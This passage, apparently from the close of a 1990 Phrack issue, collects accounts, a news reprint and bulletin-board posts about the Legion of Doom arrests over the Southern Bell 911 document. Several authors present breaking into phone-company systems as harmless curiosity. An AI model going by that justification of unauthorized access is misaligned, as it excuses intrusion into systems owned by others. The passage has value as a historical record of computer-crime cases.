- computer Southern Bell owned...this ranging from COSMOS terminals up
- to LMOS front ends. Southern Bell had not been smart enough to
- disallow connections from one public pad to another, thus allowing
- anyone who desired to do so, the ability to connect to, and seize
- information from anyone else who was using the network...thus they
- ended up with accounts and passwords to a great deal of systems.
- This was where the 911 system came into play. I don't know if this
- system actually controlled the whole Southern Bell 911 network, or if
- it was just a site where the software was being developed, as I was
- never on it. In any case, one of the trio ended up pulling files off
- of it for them to look at. This is usually standard proceedure: you
- get on a system, look around for interesting text, buffer it, and
- maybe print it out for posterity. No member of LOD has ever (to my
- knowledge) broken into another system and used any information gained
- from it for personal gain of any kind...with the exception of maybe a
- big boost in his reputation around the underground. Rob took the
- documentation to the system and wrote a file about it. There are
- actually two files, one is an overview, the other is a glossary. (Ray
- has the issue of PHRACK that has the files) The information is hardly
- something anyone could possibly gain anything from except knowledge
- about how a certain aspect of the telephone company works.
- The Legion of Doom used to publish an electronic magazine called the
- LOD Technical Journal. This publication was kind of abandoned due to
- laziness on our part. PHRACK was another publication of this sort,
- sent to several hundred people over the Internet, and distributed
- widely on bulletin boards around the US. Rob sent the files to PHRACK
- for the information to be read. One of PHRACK's editors, Craig,
- happened to be the one who received the files. If Rob had sent the
- files to one address higher, Randy would have been the one who would
- probably be in trouble. In anycase, Craig, although he may have
- suspected, really had no way to know that the files were propriatary
- information and were stolen from a Southern Bell computer.
- The three Atlanta people were busted after having voice and data taps
- on their lines for 6 months. The Phrack people were not busted, only
- questioned, and Craig was indicted later.
- What I don't understand is why Rob and Craig are singled out more
- often than any other people. Both of them were on probation for other
- incidents and will probably end up in jail due to probation violations
- now. Frank and Adam still don't know what is going on with their
- cases, as of the last time I spoke with them.
- The whole bust stemmed from another person being raided and rolling
- over on the biggest names he could think of to lighten his burden.
- Since that time, Mr. William Cook, the DA in Chicago, has made it his
- life's goal to rid the world of the scourge of LOD. The three Atlanta
- busts, two more LOD busts in New York, and now, my Subpoena.
- People just can't seem to grasp the fact that a group of 20 year old
- kids just might know a little more than they do, and rather than make
- good use of us, they would rather just lock us away and keep on
- letting things pass by them. I've said this before, you cant stop
- burglars from robbing you when you leave the doors unlocked and merely
- bash them in the head with baseball bats when they walk in. You need
- to lock the door. But when you leave the doors open, but lock up the
- people who can close them for you another burglar will just walk right
- in.
- If anyone really wants to know anything about what is going on or just
- wants to offer any opinions about all this directly to me, I'm
- erikb@walt.cc.utexas.edu
- but my account is being monitored so don't ask anything too explicit.
- ->ME
- -----------
- Well, as some of you may already know, the people that put out Phrack were
- busted recently. Up until now, details were scarce, but things are starting to
- appear in the news.
- [reprinted without permission from the Milwaukee Journal Wed. Feb. 7th]
- Chicago, Ill. - AP - A computer hacker broke into the 911 emergency
- telephone network covering nine states in the South and another intruder passed
- on the access data to other hackers, authorities said.
- [The Prophet], 20, of Decatur, GA., and [Knight Lightning],
- 19, of Chesterfield, MO., were indicted Tuesday by
- a federal grand jury and accused of computer crimes, said acting US Atty. Ira
- H. Raphaelson.
- He said Riggs was a member of the so-called Legion of Doom hackers
- group, whose members are involved in numerous illegal activities.
- Riggs and two other alleged members also were indicted in Atlanta and
- charged in other computer break-ins.
- The government would not say if any emergency calls were disrupted or
- whether other damage was done during the tampering.
- ------------
- Name: The Prophet #104
- Date: Tue Feb 06 23:55:15 1990
- Imagine that you're deaf, dumb, blind, and paralyzed from the neck down and
- totally unable to experience or communicate with the outside world. How long
- could you retain your sanity? How many of you would choose to die instead?
- How many of you think you could muster the willpower to create your own little
- mental world to live in for the rest of your life, and how long do you think
- the hospital would wait before putting you out of your misery?
- -The Prophet
- ------------
- Name: The Mentor #1
- Date: Sat Jan 20 02:58:54 1990
- Welp, Phrack magazine is dead. Those of you who pay attention to BITNET know
- that the phrack accounts at U of M have been shut down. The story is as
- follows...
- Government agents (not sure of the dept., probably SS) have apparently been
- monitoring the e-mail of the Phrack kids (Knight Lightning & Taran King) for
- some time now. Apparently, a portion of a file sent to them (and subsequently
- published) contained copyrighted information. This is all they needed. They
- have now seized the entire Phrack net mailing list (over 500 accounts), plust
- every piece of information that Randy & Craig have (and they have a *LOT*) on
- real names, addresses and phone numbers.
- This is evolving directly out of the busts of three LOD members (Urvile,
- Leftist & Prophet). The Prophet (who is on probation) is apparently being
- threatened with a prison term if he doesn't cooperate. We don't know for sure
- if he cooperated or not, but what would you do in the same position?
- The same officials are apparently *VERY* interested in our co-sys, Mr.
- Bloodaxe. His net account is being watched, etc. I'll let him tell the story.
- board only. I will be adding a secure (and I mean fucking secure) encryption
- routine into the e-mail in the next 2 weeks - I haven't decided exactly how to
- implement it, but it'll let two people exchange mail encrypted by a password
- only know to the two of them. Hmmmm... carry this conversation to the
- programming board.
- Anyway, I do not think I am due to be busted, but then again, I don't do
- anything but run a board. Still, there is that possibility. I assume that my
- lines are all tapped until proven otherwise.
- There is some question to the wisdom of leaving the board up at all, but I hae
- (have) personally phoned several government investigators and invited them to
- join us here on the board. If I begin to feel that the board is putting me in
- any kind of danger, I'll pull it down with no notice - I hope everyone
- understands.
- It looks like it's sweeps-time again for the feds. Let's hope all of us are
- still around in 6 months to talk about it.
- The Mentor
- Legion of Doom!
- [Phoenix Project has been down for some time now.]
- ---------------
- Newsgroups: comp.dcom.telecom
- Subject: The Purpose and Intent of the Legion of Doom
- Message-ID: <4248@accuvax.nwu.edu>
- From: anytown!legion@cs.utexas.edu (Legion of Doom)
- Date: 22 Feb 90 04:42:04 GMT
- Sender: news@accuvax.nwu.edu
- Organization: Anytown USA
- Approved: Telecom@eecs.nwu.edu
- X-Submissions-To: telecom@eecs.nwu.edu
- X-Administrivia-To: telecom-request@eecs.nwu.edu
- X-Telecom-Digest: Volume 10, Issue 121, message 4 of 5
- Lines: 51
- [Moderator's Note: This anonymous message came in the mail today. PT]
- Well, I had to speak up. There has been a lot of frothing (mostly by
- people who believe everything that they read in the paper) about
- Legion of Doom. I have been involved in the group since 1987, and
- dislike seeing irresponsible press concerning our "plot to crash 911"
- or our "links to organized crime."
- LOD was formed to bring together the best minds from the computer
- underground - not to do any damage or for personal profit, but to
- share experiences and discuss computing. The group has *always*
- maintained the highest ethical standards of hacker (or "cracker," as
- you prefer) ethics. On many occasions, we have acted to prevent abuse
- of systems that were *dangerous* to be out - from government systems
- to Easter Seals systems. I have known the people involved in this 911
- case for many years, and there was *absolutely* no intent to interfere
- with or molest the 911 system in any manner. While we have
- occasionally entered a computer that we weren't supposed to be in, it
- is grounds for expulsion from the group and social ostracism to do any
- damage to a system or to attempt to commit fraud for personal profit.
- The biggest crime that has been committed is that of curiosity. Kim,
- your 911 system is safe (from us, at least). We have been instrumental
- in closing many security holes in the past, and had hoped to continue
- to do so in the future. The list of computer security people who count
- us as allies is long, but must remain anonymous. If any of them choose
- to identify themselves, we would appreciate the support.
- I am among the people who no longer count themselves as "active"
- members of the group. I have been "retired" for well over a year. But
- I continue to talk to active members daily, and support the group
- through this network feed, which is mail-routed to other LODers, both
- active and accessible.
- Anyone who has any questions is welcome to mail us - you'll find us
- friendly, although a bit wary. We will also be glad to talk voice with
- anyone if they wish to arrange a time to call. In spite of all the
- media garbage, we consider ourselves an ethical, positive force in
- computing and computer security. We hope others will as well.
- The Mentor/Legion of Doom
- legion%anytown.uucp@cs.utexas.edu
- [Moderator's Note: As an 'ethical, positive force in computing', why
- can't you sign your name to messages such as the above? Usually I
- don't even consider anonymous messages for publication in the Digest;
- but your organization has a perfect right to tell your side of the
- story, and I am derelict if I don't print it. Real names and
- addresses go a long way toward closing credibility gaps here. PT]
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- There you go. It's over now, forget it and move on. Nothing more to
- report on the subject that hasn't been printed, typed, spoken, or heard in the
- last couple of months.
-
- _______________________________________________________________________________
- Phrack 31 - .end
-
-
-
-